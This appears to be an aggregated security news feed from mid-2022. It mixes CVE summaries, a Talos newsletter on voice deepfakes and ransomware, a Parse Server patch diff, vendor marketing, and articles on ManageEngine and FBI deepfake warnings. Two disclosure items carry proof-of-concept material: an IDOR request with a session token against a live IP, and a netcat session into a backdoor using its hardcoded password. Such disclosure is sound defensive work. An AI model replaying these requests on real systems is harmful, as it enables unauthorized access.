The Automox Agent installation package before 37 on macOS allows an unprivileged user to obtain root access because of incorrect access control on a file used within the PostInstall script.

Remediate vulnerabilities in days, not months

Fix vulnerabilities almost immediately. So you can sleep better knowing your endpoints are secure, automatically.

FIND OUT HOW

Automox + EDR/XDR: The fastest way to find and fix vulnerabilities

Only Automox integrates seamlessly into leading security tools. Now you can fix thousands of vulnerabilities at a time in moments, for instant, automatic endpoint security.

Today's IT demands more than legacy tools can deliver. Only Automox enables complete visibility and control for every Windows, macOS, and Linux endpoint from a single platform - at any scale. Now IT can easily act in real-time to drive greater strategic value and security outcomes for their business.

**“Great time saving and effortless product. Constantly improving and providing great support.”**

// Director Of Information Technology in the Transportation Industry

**Overall User Rating**

CVE-2022-27904: Automox: IT Operations Cloud Solution | No VPNs, No Hassle

A misconfiguration of RSA in PingID Mac Login prior to 1.1 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass.

CVE-2021-41995: Ping Identity Documentation Portal

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
We took a week off for summer vacation but are back in the thick of security things now. 
My first exposure to deepfake videos was when Jordan Peele worked with BuzzFeed News to produce this video of...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

We took a week off for summer vacation but are back in the thick of security things now. 

My first exposure to deepfake videos was when Jordan Peele worked with BuzzFeed News to produce this video of former President Barack Obama appearing to use a few not-safe-for-work words. Since then, headlines have been popping up everywhere about the dangers of deepfake videos, with people even going as far as making deepfake pornographic videos which are incredibly problematic in so many ways. 

And now, we must start worrying about deepfake voices, which somehow is even scarier to me. At least with deepfake videos, it is (so far) fairly easy to spot a fake if you spend a lot of time on the internet, and social media companies have improved their flagging systems for this type of content.  

But with fake AI voices — built off machine learning and archives of the person in question speaking — there is nothing to see. And the technology is already pretty convincing.  

An AI voice company worked on the recent “Top Gun: Maverick” movie to recreate the voice of actor Val Kilmer, who lost his natural voice due to throat cancer and uses an electric voice box in his everyday life. I’ve not seen this movie, but I would imagine the average moviegoer had no idea this was the case. 

Something I have seen is “Obi-Wan Kenobi” on Disney+, which also used the assistance of AI voice cloning technology to support the dialogue of a yet-to-be-named character in the show (my guess is Darth Vader/Anakin Skywalker because I just don’t think Hayden Christensen has the Vader voice in him).  

And in the most terrifying potential application of this technology, Amazon unveiled the potential that its Alexa voice assistant could read part of a book in a boy’s deceased grandmother’s voice. Hard stop there. I miss my late grandparents as much as anything and would give anything for another phone call with them. That doesn’t mean I’d settle for a robotic recreation of their voice.  How long before deepfake voices become a thing? I know if someone was able to duplicate my voice, my grandmother would be easily convinced that I was in danger or needed money for something. Or how long before some scammer makes it seem like George Clooney is finally calling you to ask you out on that date you’ve always wanted if you send him a $500 Amazon gift card? 

It’s amazing how far AI technology has come. And I can’t say I’m necessarily mad or concerned about its ability to make Darth Vader sound like Darth Vader. But tech companies can’t help themselves, so it’s only a matter of time before this technique gets out of hand and into cyber attackers’ control. 

**The one big thing **

Ransomware actors love to operate on the dark web so they can stay anonymous and undetected. It allows them to trade stolen credentials, share tactics with one another and leak targets’ data. Recently, we’ve discovered several ways in which our researchers have uncovered their tactics and have been able to unmask these actors. The resulting de-anonymization taught us a great deal about several groups’ campaigns and malware, including the relatively new DarkAngels. 

> **Why do I care? **This exercise taught us a great deal about how ransomware actors operate. We can see ransomware operators take several precautions to obscure their true identity online and the hosting location of their web server infrastructure. We also learned that most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany and Singapore) to host their ransomware operations sites. This is all valuable information to use in the fight against ransomware.   
> **So now what? **If you’re a security researcher yourself, there are several techniques outlined in our recent post that could be of use to you. We hope to arm the security community with as much information as possible so that others may help us in the global fight against ransomware and threat actors.  

**Other news of note**

The recent Supreme Court decision overturning nationally protected abortion rights in the U.S. has wide-ranging consequences that even reach the tech industry. Major social media companies are being asked to consider whether they’d cooperate with government investigations into women who potentially had abortions in states where it’s illegal by passing along personal information. Many women are now skeptical of period-tracking apps, too, some of which have privacy policies that openly state they would share user data with law enforcement. And the state-by-state method of abortion policy will only make the topic more complicated to untangle. (Yahoo! News, Axios, Vice Motherboard) 

A new mobile spyware is targeting Android and iOS users across Europe and Asia. The recently discovered Hermit comes from Italian vendor RCS Labs and can steal data and record and make phone calls. The spyware disguises itself as legitimate apps to trick the user into downloading it, though researchers say these apps don’t appear on Google or Apple’s app stores. Hermit shows that attackers and governments alike are still using spyware like the NSO Group’s widespread Pegasus tool. Although spyware is not strictly illegal in many countries, it is often used by governments and state-sponsored groups to target vulnerable users, including high-profile activists, politicians and journalists. (Wired, ThreatPost) 

A multi-stage remote access trojan is targeting several small and home office routers, potentially going back as far as 2020. The newly named ZuoRAT exploits known vulnerabilities in some Cisco, Netgear, Asus and DrayTek routers and infects other devices on the network and downloads other malware via DNS and HTTP hijacking. Security researchers say they’ve so far discovered at least 80 victims. (Dark Reading, Ars Technica) 

**Can’t get enough Talos? **

*   Avos ransomware group expands with new attack arsenal
*   Cisco Talos Supports Ukraine Through Empathy
*   Threat Roundup for June 17 - 24

  

**Upcoming events where you can find Talos **

**A New HOPE** (July 22 - 24, 2022)  
New York City 

**BlackHat** **U.S.** (Aug. 6 - 11, 2022)  
Las Vegas, Nevada 

**DEF CON U.S.** (Aug. 11 - 14, 2022)  
Las Vegas, Nevada 

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02

Threat Source newsletter (June 30, 2022) — AI voice cloning is somehow more scary than deepfake videos

IBM Spectrum Protect Client 8.1.0.0 through 8.1.14.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 225886.

**Security Bulletin**

  

**Summary**

The IBM Spectrum Protect back-up archive client is vulnerable to information disclosure as user credentials are stored in memory in plain text. The back-up archive client is also vulnerable to a denial of service due to certain read operations on TCP/IP sockets.

**Vulnerability Details**

**CVEID:**   CVE-2022-22478  
**DESCRIPTION:**   IBM Spectrum Protect Client stores user credentials in plain clear text which can be read by a local user.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225886 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-22474  
**DESCRIPTION:**   IBM Spectrum Protect dsmcad, dsmc, and dsmcsvc processes incorrectly handle certain read operations on TCP/IP sockets. This can result in a denial of service for IBM Spectrum Protect client operations.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225348 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Spectrum Protect Client

8.1.0.0-8.1.14.0

**Remediation/Fixes**

**NOTE**:  APAR IT40671 was created for CVE-2022-22474.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

29 June 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEQVQ","label":"IBM Spectrum Protect"},"Component":"Client","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF017","label":"Mac OS"},{"code":"PF033","label":"Windows"},{"code":"PF010","label":"HP-UX"},{"code":"PF027","label":"Solaris"}\],"Version":"8.1","Edition":"","Line of Business":{"code":"LOB26","label":"Storage"}}\]

CVE-2022-22478: Information Disclosure and Denial of Service Vulnerabilities in IBM Spectrum Protect Backup-Archive Client (CVE-2022-22478, CVE-2022-22474)

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. In affected versions parse Server LiveQuery does not remove protected fields in classes, passing them to the client. The LiveQueryController now removes protected fields from the client response. Users are advised to upgrade. Users unable t upgrade should use `Parse.Cloud.afterLiveQueryEvent` to manually remove protected fields.

@@ -10,11 +10,18 @@ import { ParsePubSub } from './ParsePubSub'; import SchemaController from '../Controllers/SchemaController'; import \_ from 'lodash'; import { v4 as uuidv4 } from 'uuid'; import { runLiveQueryEventHandlers, getTrigger, runTrigger, resolveError, toJSONwithObjects } from '../triggers'; import { runLiveQueryEventHandlers, getTrigger, runTrigger, resolveError, toJSONwithObjects, } from '../triggers'; import { getAuthForSessionToken, Auth } from '../Auth'; import { getCacheController } from '../Controllers'; import { getCacheController, getDatabaseController } from '../Controllers'; import LRU from 'lru-cache'; import UserRouter from '../Routers/UsersRouter'; import DatabaseController from '../Controllers/DatabaseController';  
class ParseLiveQueryServer { clients: Map; @@ -185,14 +192,14 @@ class ParseLiveQueryServer { if (res.object && typeof res.object.toJSON \=== 'function') { deletedParseObject \= toJSONwithObjects(res.object, res.object.className || className); } if ( (deletedParseObject.className \=== '\_User' || deletedParseObject.className \=== '\_Session') && !client.hasMasterKey ) { delete deletedParseObject.sessionToken; delete deletedParseObject.authData; } await this.\_filterSensitiveData( classLevelPermissions, res, client, requestId, op, subscription.query ); client.pushDelete(requestId, deletedParseObject); } catch (e) { const error \= resolveError(e); @@ -339,16 +346,14 @@ class ParseLiveQueryServer { res.original.className || className ); } if ( (currentParseObject.className \=== '\_User' || currentParseObject.className \=== '\_Session') && !client.hasMasterKey ) { delete currentParseObject.sessionToken; delete originalParseObject?.sessionToken; delete currentParseObject.authData; delete originalParseObject?.authData; } await this.\_filterSensitiveData( classLevelPermissions, res, client, requestId, op, subscription.query ); const functionName \= 'push' + res.event.charAt(0).toUpperCase() + res.event.slice(1); if (client\[functionName\]) { client\[functionName\](requestId, currentParseObject, originalParseObject); @@ -540,6 +545,54 @@ class ParseLiveQueryServer { // return rolesQuery.find({useMasterKey:true}); }  
async \_filterSensitiveData( classLevelPermissions: ?any, res: any, client: any, requestId: number, op: string, query: any ) { const subscriptionInfo \= client.getSubscriptionInfo(requestId); const aclGroup \= \['\*'\]; let clientAuth; if (typeof subscriptionInfo !== 'undefined') { const { userId, auth } \= await this.getAuthForSessionToken(subscriptionInfo.sessionToken); if (userId) { aclGroup.push(userId); } clientAuth \= auth; } const filter \= obj \=> { if (!obj) { return; } let protectedFields \= classLevelPermissions?.protectedFields || \[\]; if (!client.hasMasterKey && !Array.isArray(protectedFields)) { protectedFields \= getDatabaseController(this.config).addProtectedFields( classLevelPermissions, res.object.className, query, aclGroup, clientAuth ); } return DatabaseController.filterSensitiveData( client.hasMasterKey, aclGroup, clientAuth, op, classLevelPermissions, res.object.className, protectedFields, obj, query ); }; res.object \= filter(res.object); res.original \= filter(res.original); }  
\_getCLPOperation(query: any) { return typeof query \=== 'object' && Object.keys(query).length \== 1 &&

CVE-2022-31112: fix: protected fields exposed via LiveQuery; this removes protected f… · parse-community/parse-server@309f64c

NXM Autonomous Security protects against network-wide device hacks and defends against critical IoT vulnerabilities.

**June 30, 2022, Mountain View, CA** \- NXM Labs, Inc., a leader in advanced cybersecurity software for connected devices, today unveiled its NXM Autonomous Security(TM) platform that prevents hackers from gaining unauthorized access to commercial, industrial, medical, or consumer internet of things (IoT) devices. Tested in collaboration with the Jet Propulsion Laboratory (JPL), California Institute of Technology (Caltech), NXM successfully demonstrated the ability of its groundbreaking technology to enable future Mars rovers to automatically defend themselves and recover from cyberattacks. Caltech manages JPL on behalf of the National Aeronautics and Space Administration (NASA).

NXM's engineers worked with JPL's Artificial Intelligence, Analytics and Innovation Division, Information Technology and Solutions Directorate (ITSD), along with the Robotic Surface Mobility Group in Pasadena, CA to integrate the company's software with the navigation and ground control systems of JPL's self-driving Athena test rover. During testing, NXM's software successfully detected unauthorized attempts to gain access to the rover's autonomous navigation systems, automatically protecting the vehicle from harm in real-time without impacting normal driving operations.

Tests showed that NXM's platform was capable of securing millions of devices with virtually no impact on network latency and is able to operate up to 1000x faster than other decentralized platforms previously tested by the U.S. Department of Defense under simulated battlefield conditions.

"NXM's technology is game-changing," said Lt. General Harry D. Raduege, Jr., USAF (Ret), former Director, Defense Information Systems Agency and CIO for the North American Aerospace Defense Command and U.S. Space Command. "NXM provides a new layer of cybersecurity that enables unified command and control, as well as data interoperability, providing an unprecedented capability that we have long sought but until now wasn't possible." Lt. General Raduege serves as an advisor to NXM.

The Athena test rover was developed by JPL as part of NASA's High Performance Spaceflight Computing (HPSC) program to develop new computing technologies with vastly more capabilities than current spaceflight computers. JPL engineers harnessed the advanced computing power of the rover's off-the-shelf NVIDIA Jetson AI platform to develop innovative, machine learning-based applications for future Mars rovers. This includes artificial intelligence software that identifies objects of scientific interest as a vehicle traverses the Martian terrain, using vision-based navigation and path planning software to significantly increase the driving distances of energy-limited rovers.

"We're thrilled to have collaborated with NASA JPL to show how our security can protect critical assets in space as well as here on Earth," said Scott Rankine, NXM's President and Co-founder. "Our unique zero-trust and zero-touch security software is chip and cloud agnostic, enabling device manufacturers and their component suppliers to easily and cost-effectively develop the industry's most trustworthy products that can be deployed rapidly and remain secure for their entire operating lifetime."

**About NXM**  
NXM Labs, Inc. provides advanced security solutions for embedded devices that enable commercial, industrial and consumer products to automatically defend themselves and recover from cyberattacks. NXM offers the industry's first Zero-Trust and Zero-Touch product development software platform designed to streamline and automate security management throughout the entire OEM supply chain and product lifecycle. For more information, visit www.nxmlabs.com

NXM Announces Platform That Protects Space Infrastructure and IoT Devices From Cyberattacks

MyAdmin v1.0 is affected by an incorrect access control vulnerability in viewing personal center in /api/user/userData?userCode=admin.

Log in with user1 account on the trial website given by the author, and click the personal center to capture the package.  
The userCode parameter has a vulnerability.  
poc:  
user1 login --> /api/user/userData?userCode=admin

    GET /api/user/userData?userCode=admin HTTP/1.1
    Host: 8.129.86.120
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    myadmin-token: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
    Connection: close
    Referer: http://8.129.86.120/
    Cookie: sidebarStatus=1; myadmin-token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ

CVE-2021-37791: There is an ultra vires vulnerability in viewing personal center · Issue #3 · cdfan/my-admin

Backdoor.Win32.Cafeini.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/a8fc1b3f7a605dc06a319bf0e14ca68b.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cafeini.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP ports 51966 and 23. Authentication is required, however the password "mama" is weak and found within the PE file. Moreover, the FTP server running on non standard port 23 also uses same password. Trying to execute a program incorrectly you get reply like, "STATUS I can't run program", as it requires the full path to the file to execute.Family: CafeiniType: PE32MD5: a8fc1b3f7a605dc06a319bf0e14ca68bVuln ID: MVID-2022-0617Disclosure: 06/29/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 51966CAFEiNi 1.1Enter your password:mamaC:\Users\victim\Desktop>whoamiwhoamiSTATUS: unknown command "WHOAMI"C:\Users\victim\Desktop>exec c:\Windows\system32\calc.exeexec c:\Windows\system32\calc.exeSTATUS: program runnedC:\Users\victim\Desktop>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Cafeini.b MVID-2022-0617 Hardcoded Credential

An unauthenticated remote code execution vulnerability found in Zoho’s compliance tool could leave organizations exposed to an information disclosure catastrophe, new analysis shows.

A critical vulnerability in Zoho’s widely used compliance tool, ManageEngine ADAudit Plus, which monitors changes to Microsoft Active Directory, leaves endpoints vulnerable to unauthenticated users. A successful exploit could allow an attacker to take over an entire enterprise network, Horizon3.ai researchers warn.  

ADAudit Plus offers a path into an organization’s workstations, servers, and file servers, giving IT admins access to a range of users, groups, permissions, and login credentials, as well as security policies. ADAudit Plus also enables users to collect security events from agents running on other machines in the domain through endpoints that agents use to upload events.

The platform’s ability to offer deep access into a company’s internal IT ecosystem heightens the potential for a nightmare-scenario level of data exposure in the event of a breach.

The CVE-2022-28219 vulnerability enables malicious actors to easily take over a network for which they already have initial access. Malicious actors could exploit this vulnerability to deploy ransomware, exfiltrate sensitive business data, or disrupt business operations.

They could also then go on to exploit XML External Entities (XXE), Java deserialization, and path traversal vulnerabilities to wreak additional havoc, according to an in-depth analysis this week by Horizon3.ai.

**Inside the Vulnerability**

Horizon3.ai discovered some of the ADAudit Plus endpoints used for reporting were unauthenticated.

“One of the first things that stood out was the presence of a /cewolf endpoint handled by the CewolfRenderer servlet in the third-party Cewolf charting library,” the analysis states. “This is the same vulnerable endpoint from CVE-2020-10189, reported against ManageEngine Desktop Central.”

It added, “This gave us a large attack surface to work with because there’s a lot of business logic that was written to process these events. While looking for a file-upload vector, we found a path to trigger a blind XXE \[XML External Entity injection\] vulnerability in the ProcessTrackingListener class, which handles events containing Windows scheduled task XML content.”

The vulnerability was disclosed to Zoho in March, which released a new build, ADAudit Plus 7060, to fix the issue. The patch fixes the vulnerability by removing the /cewolf endpoint altogether, instead using a secure version of DocumentBuilderFactoryin the ProcessingTrackingListener class and requiring authentication in the form of an agent GUID between agents and ADAudit Plus.

**High Stakes, Plus Exploitation Difficult to Detect**

Horizon3.ai chief architect Naveen Sunkavally explains that ManageEngine products are very common in the enterprise and have been favorite targets of attackers over the years.

“ADAudit Plus is a tool that's used for compliance and auditing, which is a common need for many companies spanning different verticals,” he says. “This vulnerability has been found to be present in many types of environments, from healthcare and technology to construction and local governments.”

Just last fall, ManageEngine ADSelfService Plus, Desktop Central, and ServiceDesk Plus were all actively targeted by attackers using previously undisclosed zero days (CVE-2021-44515, CVE-2021-44077, and CVE-2021-40539) that are now part of the CISA Known Exploited Vulnerabilities (KEV) list.

The latest vulnerability is easy to exploit without any prior knowledge and can yield the "keys to the kingdom,  Sunkavally explains. To boot, exploitation is not that easy to detect because it makes use of the natural behavior of the ADAudit Plus application.

“ADAudit Plus is an attractive target for attackers because it integrates with Active Directory and stores high-privileged domain user credentials,” Sunkavally says.

He notes an attacker with initial access to a compromised network could exploit this vulnerability to extract these high-privileged credentials, move laterally, and take over the entire network.

“We've seen real-world environments where just exploiting this vulnerability alone is enough to take over the enterprise,” Sunkavally adds.

He advises businesses using ADAudit Plus to upgrade to build 7060 or later and ensure ADAudit Plus is configured with a dedicated service account with restricted privileges.

“This vulnerability is not one to hold off on patching,” he says.

**Buggy ManageEngine Has History of Vulnerabilities**

This is not the first time the ManageEngine suite was found to have vulnerabilities. Last September a joint advisory from the FBI and CISA warned of APT attackers exploiting a critical authentication bypass vulnerability in ManageEngine ADSelfService Plus.

While Zoho moved to fix the vulnerabilities, less than a month later Palo Alto Networks issued a warning that many companies are still vulnerable.

Most recently, an elusive attack targeting SolarWinds' Orion network management software, dubbed the Supernova cyberattack, exploited a ManageEngine flaw in the software running on a victim's server.

Critical ManageEngine ADAudit Plus Vulnerability Allows Network Takeover, Mass Data Exfiltration

The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII.
The post Criminals are applying for remote work using deepfake and stolen identities, says FBI appeared first on Malwarebytes Labs.

The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII (personally identifiable information).

A deepfake is essentially created or modified media (image, video, or audio), often with the help of artificial intelligence (AI) and machine learning (ML). Deepfake creations are designed to appear and sound as authentic as possible. Because of this, they’re difficult to spot unless you know what to look for.

Years of data breaches made millions of Americans’ identities available for anyone with ill intent to gather and use for personal gains. This time, criminals seem confident about pulling off a scheme that fully intends to sabotage or steal from companies that hire them while keeping their true identities intact.

Armed with compelling synthetic images and videos with legitimate PII, we can imagine criminals likely getting the job before pulling the wool over their employer’s eyes.

Most open positions identified in the report were in the technology field, such as IT (information technology), computer programming, database, and software. The FBI has also noted that some positions criminals are trying to fill would grant them access to PII, financial data, corporate databases, and proprietary information.

Fortunately for organizations, there is a glaring flaw to an otherwise masterful execution of deceit: the deepfakes the criminals use suffer from sync issues.

> “Complaints report the use of voice spoofing, or potentially voice deepfakes, during online interviews of the potential applicants. In these interviews, the actions and lip movement of the person seen interviewed on-camera do not completely coordinate with the audio of the person speaking. At times, actions such as coughing, sneezing, or other auditory actions are not aligned with what is presented visually.”
> 
> ~ FBI, PSA number I-062822-PSA

Misuse of stolen PII is spotted with a pre-employment background check. So even if an interviewer puts the desyncs in a deepfake video down to a dodgy connection, criminals won’t be able to escape findings from a standard background check.

TechCrunch said the most at-risk businesses from criminals entering the job market this way are startups and SaaS (software as a service) companies. This is because these potentially hold lots of data or access to it “but comparatively little security infrastructure compared with the enterprises they serve or are attempting to displace.”

If you’re worried that your data might be used to get criminals into the same sector as you are, there’s not much to do apart from remaining alert and keeping an eye out for strange emails or phone calls.

Stay safe!

Tag

#mac